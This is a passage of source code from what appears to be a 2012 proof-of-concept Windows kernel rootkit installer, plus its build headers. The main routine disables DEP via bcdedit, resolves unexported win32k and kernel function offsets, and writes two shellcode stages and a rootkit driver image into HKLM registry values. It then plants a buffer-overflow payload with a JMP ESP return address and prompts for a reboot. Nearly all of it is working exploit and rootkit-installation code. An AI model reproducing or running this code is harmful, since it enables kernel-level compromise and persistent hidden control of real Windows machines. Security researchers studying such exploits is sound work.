(offset_UserInitialize > 0) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"() ERROR: multipile heuristic matches for win32k!UserInitialize()\n" ); FreeLibrary(hMod); return FALSE; } offset_UserInitialize = Rva - i; DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): win32k!UserInitialize() found at offset 0x%.8x\n", offset_UserInitialize ); break; } } } else if (!wcscmp((LPWSTR)VarAddr, WIN32K_STR_2)) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): \"%ws\" referenced at offset 0x%.8x\n", WIN32K_STR_2, Rva ); /* Check for the following code in win32k!bInitializeEUDC(): mov ?SharedQueryTable@@A.Name, offset aFontlinkdefaul ; "FontLinkDefaultChar" mov ?SharedQueryTable@@A.EntryContext, eax call edi ; RtlQueryRegistryValues(x,x,x,x,x) test eax, eax jge short loc_BF80525F */ LONG InstPtr = -6; PUCHAR pInst = (PUCHAR)Va; if (*(PUSHORT)(pInst + InstPtr) == 0x05c7) { // disassemble next 5 instructions for (DWORD i = 0; i < 5; i++) { LONG InstLen = (LONG)c_Catchy(pInst + InstPtr); if (InstLen == (LONG)CATCHY_ERROR) { DbgMsg(__FILE__, __LINE__, __FUNCTION__"() ERROR: c_Catchy() fails\n"); FreeLibrary(hMod); return FALSE; } InstPtr += InstLen; // check for call edi / test eax, eax if (*(PUSHORT)(pInst + InstPtr + 0) == 0xd7ff && *(PUSHORT)(pInst + InstPtr + 2) == 0xc085) { if (offset_bInitializeEUDC_patch > 0) { DbgMsg( __FILE__, __LINE__, __FUNCTION__"() ERROR: multipile heuristic matches for win32k!bInitializeEUDC()\n" ); FreeLibrary(hMod); return FALSE; } offset_bInitializeEUDC_patch = Rva + InstPtr; DbgMsg( __FILE__, __LINE__, __FUNCTION__"(): win32k!bInitializeEUDC() CALL EDI found at offset 0x%.8x\n", offset_bInitializeEUDC_patch ); break; } } } } } } } } pRelocation = (PIMAGE_BASE_RELOCATION)((PUCHAR)pRelocation + pRelocation->SizeOfBlock); Size += pRelocation->SizeOfBlock; } } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__ "() ERROR: Relocation directory not found\n"); } FreeLibrary(hMod); } else { DbgMsg(__FILE__, __LINE__, __FUNCTION__"(): LoadLibraryEx() ERROR %d\n", 
GetLastError()); } if (offset_UserInitialize > 0 && offset_bInitializeEUDC_patch > 0) { *poffset_UserInitialize = offset_UserInitialize; *poffset_bInitializeEUDC_patch = offset_bInitializeEUDC_patch; return TRUE; } return FALSE; } //-------------------------------------------------------------------------------------- #define GET_KERNEL_PROC_OFFSET(_fn_) \ \ DWORD offset_##_fn_ = (DWORD)GetKernelProcOffset(#_fn_); \ if (offset_##_fn_ == NULL) \ { \ DbgMsg(__FILE__, __LINE__, "ERROR: nt!" #_fn_ "() is not found\n"); \ goto end; \ } \ else \ { \ DbgMsg( \ __FILE__, __LINE__, "nt!" #_fn_ "() offset is 0x%.8x\n", \ offset_##_fn_ \ ); \ } int _tmain(int argc, _TCHAR* argv[]) { DbgMsg( __FILE__, __LINE__, "\n***********************************************************\n\n" " Windows kernrel rootkit PoC using registry values processing BoF.\n" " FOR INTERNAL USE ONLY!\n\n" " (c) 2012 Oleksiuk Dmytro (aka Cr4sh)\n" " cr4sh@riseup.net\n" "\n***********************************************************\n\n" ); BOOL bSupportedOS = TRUE; #if defined(_X86_) BOOL bIs64 = FALSE; typedef BOOL (WINAPI * func_IsWow64Process)( HANDLE hProcess, PBOOL Wow64Process ); func_IsWow64Process f_IsWow64Process = (func_IsWow64Process) GetProcAddress(GetModuleHandle("kernel32.dll"), "IsWow64Process"); if (f_IsWow64Process) { // check for WOW64 environment f_IsWow64Process(GetCurrentProcess(), &bIs64); } bSupportedOS = !bIs64; #endif // _X86_ OSVERSIONINFOA Version; Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); if (GetVersionExA(&Version)) { if (Version.dwPlatformId != VER_PLATFORM_WIN32_NT || Version.dwMajorVersion != 6 || Version.dwMinorVersion != 1) { bSupportedOS = FALSE; } } else { DbgMsg(__FILE__, __LINE__, "GetVersionEx() ERROR %d\n", GetLastError()); goto end; } if (!bSupportedOS) { MessageBox( 0, "This PoC supports only x86 versions of Windows 7 and Server 2008 R2", "ERROR", MB_ICONERROR ); return -1; } // check for the uninstall option if (argc >= 2 && !strcmp(argv[1], 
"--uninstall")) { DbgMsg( __FILE__, __LINE__, "[+] Deleting 1-st shellcode from \"%s\\%s\"...\n", EXPL_KEY, EXPL_VAL ); HKEY hKey; LONG Code = RegOpenKey(HKEY_LOCAL_MACHINE, EXPL_KEY, &hKey); if (Code == ERROR_SUCCESS) { // delete first rootkit part Code = RegDeleteValue(hKey, EXPL_VAL); if (Code == ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "[+] DELETED\n"); } else if (Code == ERROR_FILE_NOT_FOUND) { DbgMsg(__FILE__, __LINE__, "[!] NOT FOUND\n"); } else { DbgMsg(__FILE__, __LINE__, "RegDeleteValue() ERROR %d\n", Code); } RegCloseKey(hKey); } else { DbgMsg(__FILE__, __LINE__, "RegOpenKey() ERROR %d\n", Code); } DbgMsg(__FILE__, __LINE__, "[+] Deleting 2-nd shellcode from \"%s\\%s\"...\n", SC2_KEY, SC2_VAL); Code = RegOpenKey(HKEY_LOCAL_MACHINE, SC2_KEY, &hKey); if (Code == ERROR_SUCCESS) { // delete first rootkit part Code = RegDeleteValue(hKey, SC2_VAL); if (Code == ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "[+] DELETED\n"); } else if (Code == ERROR_FILE_NOT_FOUND) { DbgMsg(__FILE__, __LINE__, "[!] 
NOT FOUND\n"); } else { DbgMsg(__FILE__, __LINE__, "RegDeleteValue() ERROR %d\n", Code); } RegCloseKey(hKey); } else { DbgMsg(__FILE__, __LINE__, "RegOpenKey() ERROR %d\n", Code); } MessageBox(0, "Rootkit uninstalled!", "SUCCESS", MB_ICONINFORMATION); return 0; } if (argc >= 2 && !strcmp(argv[1], "--dbgbreaks")) { m_DebugBreaks = TRUE; } DbgMsg(__FILE__, __LINE__, "[+] Disabling DEP...\n"); system("bcdedit.exe /set {current} nx AlwaysOff"); system("bcdedit.exe /set {current} pae ForceEnable"); DWORD dwShellcodeSize_1 = ScGetSize((PDWORD)Shellcode_1); DWORD dwShellcodeSize_2 = ScGetSize((PDWORD)Shellcode_2); DbgMsg(__FILE__, __LINE__, "[+] 1-st shellcode size is %d bytes\n", dwShellcodeSize_1); DbgMsg(__FILE__, __LINE__, "[+] 2-nd shellcode size is %d bytes\n", dwShellcodeSize_2); DWORD offset_UserInitialize = 0; DWORD offset_bInitializeEUDC_patch = 0; // find unexported functions of win32k, that are needed for exploitation if (!AnalyseWin32k(&offset_UserInitialize, &offset_bInitializeEUDC_patch)) { DbgMsg(__FILE__, __LINE__, "ERROR: win32k.sys image analysis fails\n"); goto end; } GET_KERNEL_PROC_OFFSET(MmIsAddressValid); GET_KERNEL_PROC_OFFSET(PsGetCurrentProcess); GET_KERNEL_PROC_OFFSET(PsGetProcessWin32Process); GET_KERNEL_PROC_OFFSET(ExAllocatePool); GET_KERNEL_PROC_OFFSET(RtlQueryRegistryValues); GET_KERNEL_PROC_OFFSET(DbgPrint); HKEY hKey; LONG Code = RegOpenKey(HKEY_LOCAL_MACHINE, SC2_KEY, &hKey); if (Code == ERROR_SUCCESS) { int Ptr = 0, SignLen = lstrlen(REG_SIGN_FULL); UCHAR Buff[SHELLCODE_2_MAX_BUFF_SIZE]; FillMemory(&Buff, sizeof(Buff), 0x90); for (int i = 0; i <= 16; i++) { /** * Place signatures at different offsets from the * begining of the buffer. 
* * kd> s 0x8d000000 Lffffff 0x40 0x50 0x41 0x51 0x90 * */ memcpy(&Buff[Ptr + i], REG_SIGN_FULL, SignLen); Ptr += 16; } if (SHELLCODE_2_MAX_BUFF_SIZE - (DWORD)Ptr <= dwShellcodeSize_2) { DbgMsg(__FILE__, __LINE__, "ERROR: Buffer to small\n"); goto end; } // copy 2-nd shellcode to the buffer memcpy(&Buff[Ptr], Shellcode_2, dwShellcodeSize_2); PSC_PARAMS ShellcodeParams = (PSC_PARAMS)(&Buff[Ptr + dwShellcodeSize_2]); ZeroMemory(ShellcodeParams, sizeof(SC_PARAMS)); if (Buff[Ptr] == 0xcc && !m_DebugBreaks) { // remove debug break Buff[Ptr] = 0x90; } // set constants and parameters for 2-nd shellcode ShellcodeParams->offset_MmIsAddressValid = offset_MmIsAddressValid; ShellcodeParams->offset_PsGetCurrentProcess = offset_PsGetCurrentProcess; ShellcodeParams->offset_PsGetProcessWin32Process = offset_PsGetProcessWin32Process; ShellcodeParams->offset_ExAllocatePool = offset_ExAllocatePool; ShellcodeParams->offset_RtlQueryRegistryValues = offset_RtlQueryRegistryValues; ShellcodeParams->offset_UserInitialize = offset_UserInitialize; ShellcodeParams->offset_bInitializeEUDC_patch = offset_bInitializeEUDC_patch; ShellcodeParams->rootkit_size = sizeof(rootkit_driver); #ifdef USE_SHELLCODE_DBGPRINT ShellcodeParams->offset_DbgPrint = offset_DbgPrint; strcpy_s(ShellcodeParams->szDbgPrintMessage, DBGPRINT_MESSAGE_LEN, DBGPRINT_MESSAGE); #endif DbgMsg(__FILE__, __LINE__, "[+] Saving 2-nd shellcode to \"%s\\%s\"...\n", SC2_KEY, SC2_VAL); Code = RegSetValueEx(hKey, SC2_VAL, 0, REG_BINARY, (PBYTE)&Buff, sizeof(Buff)); if (Code != ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "RegSetValueEx() ERROR %d\n", Code); } else { DbgMsg(__FILE__, __LINE__, "[+] SUCCESS\n"); } DbgMsg(__FILE__, __LINE__, "[+] Saving rootkit image to \"%s\\%s\"...\n", SC2_KEY, DRV_VAL); Code = RegSetValueEx(hKey, DRV_VAL, 0, REG_BINARY, (PBYTE)&rootkit_driver, sizeof(rootkit_driver)); if (Code != ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "RegSetValueEx() ERROR %d\n", Code); } else { DbgMsg(__FILE__, __LINE__, "[+] 
SUCCESS\n"); } RegCloseKey(hKey); } else { DbgMsg(__FILE__, __LINE__, "RegOpenKey() ERROR %d\n", Code); } DWORD dwDataSize = BOF_MIN_LENGTH + dwShellcodeSize_1; PVOID pData = malloc(dwDataSize); if (pData) { *(PDWORD)((PUCHAR)pData + BOF_RET_OFFSET) = JMP_ESP_ADDR; memcpy((PUCHAR)pData + BOF_MIN_LENGTH, Shellcode_1, dwShellcodeSize_1); if (*((PUCHAR)pData + BOF_MIN_LENGTH) == 0xcc && !m_DebugBreaks) { // remove debug break *((PUCHAR)pData + BOF_MIN_LENGTH) = 0x90; } ScWriteDword( (PUCHAR)pData + BOF_MIN_LENGTH, dwShellcodeSize_1, marker_MmIsAddressValid, offset_MmIsAddressValid ); DbgMsg(__FILE__, __LINE__, "[+] Adding malicious data for value \"%s\\%s\"...\n", EXPL_KEY, EXPL_VAL); Code = RegOpenKey(HKEY_LOCAL_MACHINE, EXPL_KEY, &hKey); if (Code == ERROR_SUCCESS) { // set malicious value Code = RegSetValueEx(hKey, EXPL_VAL, 0, REG_BINARY, (PBYTE)pData, dwDataSize); if (Code != ERROR_SUCCESS) { DbgMsg(__FILE__, __LINE__, "RegSetValueEx() ERROR %d\n", Code); } else { DbgMsg(__FILE__, __LINE__, "[+] SUCCESS\n"); if (MessageBox( 0, "Rootkit installed, rebot the box now?", "SUCCESS", MB_ICONINFORMATION | MB_YESNO) == IDYES) { // reboot the system LoadPrivileges(SE_SHUTDOWN_NAME); ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION); return 0; } } RegCloseKey(hKey); } else { DbgMsg(__FILE__, __LINE__, "RegOpenKey() ERROR %d\n", Code); } free(pData); } end: printf("Press any key to quit...\n"); _getch(); return 0; } //-------------------------------------------------------------------------------------- // EoF ================================================ FILE: src/rootkit_installer/rootkit_installer.vcproj ================================================ ================================================ FILE: src/rootkit_installer/stdafx.cpp ================================================ // stdafx.cpp : source file that includes just the standard includes // win32k_FontLinkDefaultChar.pch will be the pre-compiled header // stdafx.obj will contain the 
pre-compiled type information

#include "stdafx.h"

// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

================================================
FILE: src/rootkit_installer/stdafx.h
================================================
// Precompiled-header include list and build switches for the installer project.
#pragma once

#include "targetver.h"

// NOTE(review): the four directives below carry no header name in this copy
// (the <...> names appear to have been lost in extraction); they have to be
// restored from the original file before this header can compile.
#include
#include
#include
#include

// When defined, the installer's main routine also fills offset_DbgPrint and
// szDbgPrintMessage in the second-stage parameter block. That block sits in
// the buffer saved as a REG_BINARY value (SC2_KEY / SC2_VAL), so a build with
// this switch stores the debug message string inside that registry value.
#define USE_SHELLCODE_DBGPRINT
// NOTE(review): not referenced in the code visible here; presumably selects
// the debug build of the embedded driver image. Confirm in the installer source.
#define USE_DEBUG_DRIVER

#include "../common/common.h"
#include "../common/ntdll_defs.h"
#include "../common/undocnt.h"
#include "../common/debug.h"
#include "../common/catchy32.h"
#include "../common/shellcode2_struct.h"

// Links a prebuilt binary library from the source tree. The repository listing
// shows only catchy32.h and catchy32.lib, so the library's contents cannot be
// reviewed from source here.
#pragma comment(lib, "../common/catchy32.lib")

================================================
FILE: src/rootkit_installer/targetver.h
================================================
#pragma once

// The following macros define the minimum required platform. The minimum required platform
// is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run
// your application. The macros work by enabling all features available on platform versions up to and
// including the version specified.

// Modify the following defines if you have to target a platform prior to the ones specified below.
// Refer to MSDN for the latest info on corresponding values for different platforms.
#ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista.
#define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows.
#endif